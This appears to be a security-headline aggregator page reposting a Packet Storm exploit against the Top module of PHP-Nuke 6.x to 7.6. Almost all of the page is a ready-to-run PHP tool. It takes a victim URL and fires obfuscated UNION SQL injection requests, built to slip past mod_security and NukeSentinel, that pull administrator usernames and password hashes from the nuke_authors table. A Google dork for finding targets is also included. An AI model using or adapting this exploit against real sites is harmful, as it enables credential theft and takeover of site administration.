Security
Headlines
HeadlinesLatestCVEs

Headline

PHP-Nuke Top Module SQL Injection

The Top module for PHP-Nuke versions 6.x and below 7.6 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#windows#google#php#auth
# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )# Google Dork: intext: Powered by PHP-Nuke# Date: 2024-10-07# Exploit Author: Emiliano Febbi# Vendor Homepage: https://phpnuke.org/# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/# Version: 6.x < 7.6# Tested on: Windows 10[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.<?phpecho '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center><body bgcolor="black"><body link="yellow"><font color="white"><pre>new exploit concept#######################################################################This exploit is for Top Module of PHP-Nuke 6.x < 7.6                ##auto-bypass *illegal operation* , *mod security* , *NukeSentinel*   ##allowed http and https protocols. Code by Emiliano Febbi            #######################################################################</pre><form action="'.$SERVER[PHP_SELF].'" method="POST"><font color="red">~ insert victim site ~ </font>(*the folder must be specified)<br><input type="text" name="victim" value="http://www.site.com"><br><label for="dlt"><font color="white">++method++</font></label><select name="exploit_nuke" id="lang"><option value="one">#1</option><option value="two">#2</option></select><br><input type="submit" value="launch!"/><br></form></font></body></html>';if($_POST['victim']) {       $site = $_POST['victim'];    $j = $_POST['exploit_nuke'];        switch ($j) {                 /*#method1*/             case "one":             /*#Get info from victim site*/        if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";          else echo "<font color='yellow'>~missing Admin Login</font><br><br>";             if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";           else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print '<font color="white">--------------------------------------<br></font>';             /*#Get user1*/             print "<font color='white'>#user1:<br><font color='lime'>";                 $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");     $comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user);    $comment_user=explode("</a>",$comment_user[1]);            var_dump(strip_tags($comment_user[0]));                                echo "</font><br>";             /*#Get pwd1*/                    print "#password1:<br><font color='red'>";                 $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");                 $comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content);              $comment=explode("</a>",$comment[1]);                 var_dump(strip_tags($comment[0]));                                echo "</font><br>";                                    /*#Get user2*/                      print "#user2:<br><font color='lime'>";                 $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");     $comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2);  $comment_user2=explode("</a>",$comment_user2[2]);           var_dump(strip_tags($comment_user2[0]));                                echo "</font><br>";             /*#Get pwd2*/                        print "#password2:<br><font color='red'>"; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");               $comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2);           $comment2=explode("</a>",$comment2[2]);               var_dump(strip_tags($comment2[0]));                               echo "</font><br>";                 break;/*###################################################################################################################################*/             case "two":                /*#method2*/                /*#Get info from victim site*/             if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";          else echo "<font color='yellow'>~missing Admin Login</font><br><br>";                  if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";           else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print '<font color="white">--------------------------------------<br></font>';                /*#Get user1*/             print "<font color='white'>#user1:<br><font color='lime'>";                 $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");     $comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj);    $comment_userj=explode("</a>",$comment_userj[1]);             var_dump(strip_tags($comment_userj[0]));                                  echo "</font><br>";             /*#Get pwd1*/                   print "#password1:<br><font color='red'>";                 $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");     $comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp);    $comment_userp=explode("</a>",$comment_userp[1]);             var_dump(strip_tags($comment_userp[0]));                                  echo "</font><br>";                                    /*#Get user2*/             print "#user2:<br><font color='lime'>";             $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");     $comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz);    $comment_userz=explode("</a>",$comment_userz[2]);             var_dump(strip_tags($comment_userz[0]));                                  echo "</font><br>";             /*#Get pwd2*/                      print "#password2:<br><font color='red'>"; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");     $comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq);    $comment_userq=explode("</a>",$comment_userq[2]);             var_dump(strip_tags($comment_userq[0]));                                  echo "</font><br>";                                               break;                                                   };;                                                   };;;?>[/code]

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution